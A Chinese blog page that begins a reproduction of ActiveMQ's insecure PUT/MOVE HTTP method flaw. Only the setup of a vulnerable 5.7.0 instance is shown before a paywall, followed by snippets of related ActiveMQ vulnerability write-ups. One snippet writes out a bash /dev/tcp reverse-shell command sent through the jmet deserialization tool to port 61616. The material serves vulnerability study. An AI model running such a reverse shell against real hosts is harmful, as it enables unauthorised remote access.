ActiveMQ漏洞复现(不安全的http方法具体利用)

最新推荐文章于 2025-11-02 22:43:37 发布
原创 最新推荐文章于 2025-11-02 22:43:37 发布 · 2.9k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#漏洞复现 #不安全的http方法的利用

本文详细介绍了如何复现ActiveMQ的不安全HTTP方法漏洞,包括环境搭建、漏洞利用步骤,如PUT和MOVE方法,导致文件路径泄露及文件移动到敏感目录。
1、搭建ActiveMQ环境
  • 环境准备
jre安装及环境变量的配置:
https://blog.csdn.net/tiantang_1986/article/details/53894947
  • 下载有漏洞版本的ActiveMQ(我用的5.7.0)
 http://activemq.apache.org/download-archives.html
  • 解压后进入bin目录,发现有win32和win64两个文件夹,这2个文件夹分别对应windows32位和windows64位操作系统的启动脚本。
    这里写图片描述
    打开对应位数操作系统的启动文件
  • 启动成功后访问url:http://localhost:8161/admin
最低0.47元/天 解锁文章
Apache ActiveMQ RCE漏洞复现(CVE-2023-46604)
0xSec
10-26 9485
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞,Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。
ActiveMQ 反序列化漏洞复现利用
Tauil的博客
07-19 1299
会发现什么都没有发生,但是在被攻击机中输入bash-i>&/dev/tcp/攻击机IP/44440>&1他是可以正常连接的,说明命令没有问题,那么唯一的可能就是存在了检验,给执行该命令,所以我们可以进行简单的绕过,将命令进行base64编码。java-jarjmet-0.1.0-all.jar-Qhacker-IActiveMQ-s-Y“bash-i>&/dev/tcp/攻击机IP/44440>&1”-YpROME被攻击机IP61616。(一定要是java8!......
[Vulhub] ActiveMQ漏洞
weixin_45605352的博客
01-10 3917
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 0x00 漏洞描述 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.13.0 之前的 5.x 版本安全漏洞,该程序造成的漏洞限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用漏洞执行任意代码。
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
m0_74402888的博客
04-30 1717
1.在IDEA中建立好了SpringBoot项目,并配置好了docker容器,然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其中61616端口是工作端口,消息在这个端口上传递;
ActiveMQ任意文件上传漏洞复现(CVE-2016-3088漏洞复现
最新发布
lb132576的博客
11-02 498
activemq任意文件上传漏洞
记一次ActiveMQ漏洞利用
未完成的歌~的博客
08-25 1430
Apache ActiveMQ 是 Apache 软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务、集群、Spring Framework 等。随着中间件的启动,会打开两个端口,61616 是工作端口,消息在这个端口进行传递;8161 是 Web 管理控制台。
ActiveMQ的一个bug
dato0123
10-17 188
上午老板给了我一个小任务:解决他笔记本连网的时候ActiveMQ无法启动的问题。我拔了网线后,启动ActiveMQ,报下面的错: <!--<br><br>Code highlighting produced by Actipro CodeHighlighter (freeware)<br>http://www.CodeHighlighter.com/...
ActiveMQ漏洞总结
qq_42176207的博客
05-08 7943
ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。 Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 Ac
Apache activeMQ漏洞复现put和move方法
ranuy阮的博客
04-19 2177
漏洞说明 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用漏洞执行任意代码...
vulhub——ActiveMQ漏洞
qq_55202378的博客
05-22 1920
所以,只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。允许具有代理网络访问权限的远程攻击者“通过操纵OpenWire协议中的序列化类类型来运行任意shell命令,从而使代理实例化类路径上的任何类”,问题的根本原因是安全的反序列化。默认的ActiveMQ账号密码均为admin,首先访问。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。:程序没有限制可在代理中序列化的类,远程攻击者可借助特制的序列化的。
activemq-bug
qq_32640013的博客
08-01 677
文章目录activemq-bugjavax.jms.IllegalStateException: Not a transacted session activemq-bug javax.jms.IllegalStateException: Not a transacted session 翻译:是事务会话 原因:没有开启事务 解决:将一个形参改为 true ,表示开启事务。 session = ...
ActiveMQ 漏洞
per_se_veran_ce的博客
12-30 617
环境:docker ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用漏洞执行任意代码。 背景简介 ActiveMQ Web控制台分为三个应用程序:admin,ap
ActiveMQ漏洞合集
LainWith的博客
12-26 2351
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。
ActiveMQ 反序列化漏洞(CVE-2015-5254)
The code way of kinnisoy
10-24 2196
ActiveMQ 反序列化漏洞(CVE-2015-5254)
ActiveMQ系列漏洞汇总
热门推荐
AaronLuo
06-06 1万+
ActiveMQ 反序列化漏洞(CVE-2015-5254) Apache ActiveMQ是美国Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring FrameWork。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用漏洞执行任意代码。 信息搜集 nmap -sS -T5 -n
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
weixin_44047654的博客
11-25 3955
ActiveMQ 信息泄漏漏洞(CVE-2017-15709)
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
m0_59839948的博客
09-05 1968
广东东软学院的学生,web安全技术漏洞复现可以参考
ActiveMQ CVE-2015-5254 漏洞利用工具介绍
资源摘要信息:"ActiveMQ反序列化漏洞(CVE-2015-5254)是一种在Apache ActiveMQ 5.11.1之前的版本中存在的安全漏洞。它允许攻击者通过发送恶意的序列化消息,利用Java反序列化机制触发恶意代码执行,进而可能导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值